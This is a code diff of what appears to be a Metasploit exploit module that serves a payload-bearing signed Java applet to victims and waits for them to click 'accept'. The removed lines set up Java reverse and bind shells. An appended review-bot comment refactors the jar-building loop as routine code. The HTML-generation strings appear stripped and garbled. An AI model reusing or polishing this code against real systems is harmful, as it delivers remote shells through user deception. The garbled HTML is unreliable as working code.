@@ -357,108 +118,68 @@ EOF print_status( "Handling request from #{cli.peerhost}:#{cli.peerport}..." ) - if target.name == 'Generic (Java Payload)' - if datastore['LHOST'] - host = datastore['LHOST'] - port = datastore['LPORT'] - print_status( "Payload will be a Java reverse shell to #{host}:#{port} from #{cli.peerhost}..." ) - else - port = datastore['LPORT'] - datastore['RHOST'] = cli.peerhost - print_status( "Payload will be a Java bind shell on #{cli.peerhost}:#{port}..." ) - end - else - payload = regenerate_payload( cli ) - if not payload - print_error( "Failed to generate the payload." ) - return - end - - # NOTE: The EXE mixin automagically handles detection of arch/platform - data = generate_payload_exe - - if data - print_status( "Generated executable to drop (#{data.length} bytes)." ) - data = Rex::Text.to_hex( data, prefix="" ) - else - print_error( "Failed to generate the executable." ) - return - end - end - - if not @use_static - # See #1543 - if datastore['CERTCN'].index(",") - print_error("CERTCN cannot contain a comma due to a bug in Rjb, commas will be removed") - end - - appletcode = get_code - - print_status "Compiling applet classes..." - compile( appletcode['classnames'], appletcode['codefiles'] ) - - print_status "Compile completed. Building jar file..." - - unsignedjar = "unsigned_#{datastore['APPLETNAME']}.jar" - @signedjar = "#{datastore['APPLETNAME']}.jar" - - build_jar( unsignedjar, - [ - # Applet - datastore['APPLETNAME'] + ".class", - # PayloadX class - datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + ".class", - # PayloadX StreamConnector for pure Java payload - datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + "$StreamConnector.class" - ] - ) - - print_status "Jar built. Signing..." - - sign_jar( datastore['CERTCN'], unsignedjar, @signedjar ) - - print_status "Jar signed. Ready to send." - else - print_status "Using static, signed jar. Ready to send." 
- end - - # TODO: gzip data and parse in java - send_response_html( cli, generate_html( data, host, port ), { 'Content-Type' => 'text/html' } ) + send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } ) return end - # load the jar file - if @use_static - path = File.join( Msf::Config.install_root, "data", "exploits", "java_signed_applet.jar" ) - elsif File.exists? File.join( datastore['JAVACACHE'], @signedjar ) - path = File.join( datastore['JAVACACHE'], @signedjar ) - end + # If we haven't returned yet, then this is a request for our applet + # jar, build one for this victim. - if path - fd = File.open( path, "rb" ) - @jar_data = fd.read(fd.stat.size) - fd.close + p = regenerate_payload(cli) + jar = p.encoded_jar + + files = [ + "metasploit/Payload.class", + "metasploit/PayloadApplet.class", + "META-INF/MANIFEST.MF", + "META-INF/SIGNFILE.DSA", + "META-INF/SIGNFILE.SF", + ] + + # Ghetto. Replace existing files in the Jar, then add in + # anything that wasn't replaced. The reason for replacing the + # .class files is to ensure that we're sending the + # Payload.class as was signed rather than a newer one that was + # updated without updating the signature. We'll just have to + # cross our fingers and hope that any updates don't break + # backwards compatibility in the handler until we can get + # signing to work from ruby. Once we can sign jars directly + # from ruby using OpenSSL, this won't be a problem. + replaced = [] + # Replace the ones that are already there. + jar.entries.map do |e| + file = File.join(Msf::Config.data_directory, "exploits", "java_signed_applet", e.name) + if File.file? file + File.open(file, "rb") do |f| + e.data = f.read(f.stat.size) + end + end + replaced << e.name end + # Add the rest + files.each { |e| + next if replaced.include? 
e + file = File.join(Msf::Config.data_directory, "exploits", "java_signed_applet", e) + File.open(file, "rb") do |f| + jar.add_file(e, f.read(f.stat.size)) + end + } print_status( "Sending #{datastore['APPLETNAME']}.jar to #{cli.peerhost}:#{cli.peerport}. Waiting for user to click 'accept'..." ) - send_response( cli, @jar_data, { 'Content-Type' => "application/octet-stream" } ) + send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } ) handler( cli ) end - def generate_html( data, host, port ) - html = "Loading, Please Wait..." - html += "

Loading, Please Wait...

" - html += "" - - html += "" if data - html += "" if host - html += "" if port - - html += "" + def generate_html + html = %Q|Loading, Please Wait... | + html += %Q|

Loading, Please Wait...

| + html += %Q|\n| + html += %Q|| return html end end +
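Review bot: `jar.entries.map do … end` in the jar-building section is used purely for its side effects and its result is thrown away; `each` says what the loop does. The `replaced` array is appended for every entry whether or not a signed copy was found under data/exploits/java_signed_applet, so its name overstates what happened (it really records which names were already present), and the second loop reuses `e` for a filename after the first loop used it for a jar entry. The data directory path is also built twice. The rewrite below keeps the behaviour (including the `File.file?` tolerance in the first loop and the raise from `File.open` in the second if a listed data file is missing, which is worth a deliberate decision) and only renames and de-duplicates.
```ruby
			# … unchanged: files list and the explanatory comment …
			data_dir = File.join(Msf::Config.data_directory, "exploits", "java_signed_applet")
			present = []
			jar.entries.each do |entry|
				signed_copy = File.join(data_dir, entry.name)
				File.open(signed_copy, "rb") { |f| entry.data = f.read(f.stat.size) } if File.file? signed_copy
				present << entry.name
			end
			files.each do |name|
				next if present.include? name
				File.open(File.join(data_dir, name), "rb") { |f| jar.add_file(name, f.read(f.stat.size)) }
			end
			# … unchanged: print_status, send_response, handler …
```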